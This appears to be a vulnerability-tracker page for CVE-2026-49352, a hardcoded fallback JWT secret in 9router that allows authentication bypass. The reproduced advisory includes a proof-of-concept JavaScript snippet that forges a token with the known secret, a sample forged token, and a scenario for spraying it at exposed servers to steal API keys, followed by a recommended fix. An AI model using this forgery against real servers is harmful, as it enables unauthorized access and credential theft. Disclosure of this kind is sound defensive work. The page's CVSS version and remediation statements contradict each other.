CVE-2026-49352

CRITICALPre-NVD 9.89.8
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.8 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
9.8
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 9.8Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

9router's Hardcoded Default fallback JWT Secret Allows Authentication Bypass

Summary

9router uses a publicly known hardcoded string "9router-default-secret-change-me" as the fallback of JWT secret for all Dashboard session JWTs when the JWT_SECRET environment variable is not set. Because this secret is committed in the public repository and unchanged across all releases, any unauthenticated remote attacker can forge a valid auth_token cookie and gain full access to dashboard and api (If JWT_SECRET is not set on server) . This vulnerable affected so many public 9router server

Details

| Versions | File | Note | |---|---|---| | >= 0.2.21, <= 0.4.30 | src/app/api/auth/login/route.js + src/middleware.js | Introduced in commit 23cfb19 | | >= 0.4.31, <= 0.4.41 | src/lib/auth/dashboardSession.js | Relocated by OIDC refactor c3d91b0, secret unchanged |

Vulnerable Code

v0.2.21 – v0.4.30src/app/api/auth/login/route.js and src/middleware.js:

const SECRET = new TextEncoder().encode(
  process.env.JWT_SECRET || "9router-default-secret-change-me"
);

v0.4.31 – v0.4.41 (current)src/lib/auth/dashboardSession.js (centralized via OIDC refactor, commit c3d91b0):

const SECRET = new TextEncoder().encode(
  process.env.JWT_SECRET || "9router-default-secret-change-me"
);
The fallback string was introduced in commit 23cfb19 (2026-01-09) and has never been removed. The OIDC refactor in c3d91b0 only relocated it to a shared module . This vulnerability has existed since 9router first introduced authentication.

PoC

Step 1. Craft a JWT signed with the known default secret:
import { SignJWT } from "jose";

const SECRET = new TextEncoder().encode("9router-default-secret-change-me");

const token = await new SignJWT({ authenticated: true }) .setProtectedHeader({ alg: "HS256" }) .setIssuedAt() .setExpirationTime("36y") .sign(SECRET);

console.log(token); // example a valid auth_token=eyJhbGciOiJIUzI1NiJ9.eyJhdXRoZW50aWNhdGVkIjp0cnVlLCJpYXQiOjE3Nzg3Njk4NTYsImV4cCI6MjkxNDg0MzQ1Nn0.enMLEqYZKFuzxkmRH6qd3E-Ub-20wOjmiEfP4KyIG6w

Step 2. Set the forged token as the auth_token cookie. And access the http:///dashboard - completely authentication bypass

Attack Scenario:

  • Attacker can use this JWT to spray to all server that they found in the internet and gain dashboard access if a server doesn't set JWT_SECRET
  • Then they can steal valuable API Key , Auth Token via http:// target /api/settings/database

Impact

  • A successful attack grants attacker full API Key, Auth Token that 9router hold
  • They can read 9router apikey, change 9router password ,shutdown 9router, Modify everything
  • Pivot via the MCP stdio→SSE bridge exposed at /api/mcp/ (exploit CVE-2026-46339)

Recommended Fix

Require JWT_SECRET at startup and fail fast rather than falling back silently:

const jwtSecret = process.env.JWT_SECRET;
if (!jwtSecret) {
  throw new Error(
    "JWT_SECRET environment variable is not set. " +
    "Generate one with: openssl rand -hex 32"
  );
}
const SECRET = new TextEncoder().encode(jwtSecret);

Alternatively, auto-generate a random secret on first boot and persist it to the data directory — but never fall back to a publicly known constant.

CVSS v3
9.8
EG Score
9.8(low)
EPSS
KEV
Not listed

Published

July 2, 2026

Last Modified

July 2, 2026

Vendor Advisories for CVE-2026-49352(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 27× in last 7d / 27× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 07:23 UTCEG score recompute
  2. 2026-07-07 03:17 UTCEG score recompute
  3. 2026-07-06 23:13 UTCEG score recompute
  4. 2026-07-06 19:09 UTCEG score recompute
  5. 2026-07-06 15:02 UTCEG score recompute
  6. 2026-07-06 10:55 UTCEG score recompute
  7. 2026-07-06 06:40 UTCEG score recompute
  8. 2026-07-06 02:35 UTCEG score recompute
  9. 2026-07-05 22:30 UTCEG score recompute
  10. 2026-07-05 18:26 UTCEG score recompute
  11. 2026-07-05 14:22 UTCEG score recompute
  12. 2026-07-05 10:18 UTCEG score recompute
  13. 2026-07-05 06:14 UTCEG score recompute
  14. 2026-07-05 02:08 UTCEG score recompute
  15. 2026-07-04 22:04 UTCEG score recompute
  16. 2026-07-04 17:59 UTCEG score recompute
  17. 2026-07-04 13:54 UTCEG score recompute
  18. 2026-07-04 09:47 UTCEG score recompute
  19. 2026-07-04 05:42 UTCEG score recompute
  20. 2026-07-04 01:37 UTCEG score recompute
  21. 2026-07-03 21:32 UTCEG score recompute
  22. 2026-07-03 17:28 UTCEG score recompute
  23. 2026-07-03 13:24 UTCEG score recompute
  24. 2026-07-03 09:20 UTCEG score recompute
  25. 2026-07-03 05:17 UTCEG score recompute
Show 2 more
  1. 2026-07-03 01:11 UTCEG score recompute
  2. 2026-07-02 21:06 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-49352?
CVE-2026-49352 is a critical vulnerability published on July 2, 2026. 9router's Hardcoded Default fallback JWT Secret Allows Authentication Bypass Summary 9router uses a publicly known hardcoded string "9router-default-secret-change-me" as the fallback of JWT secret for all Dashboard session JWTs when the JWTSECRET environment variable is not set. Because this secret…
When was CVE-2026-49352 disclosed?
CVE-2026-49352 was first published in the National Vulnerability Database on July 2, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-49352?
CVE-2026-49352 has a CVSS v4.0 base score of 9.8 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-49352?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-49352, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-49352

Explore →

Is Your Infrastructure Affected by CVE-2026-49352?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.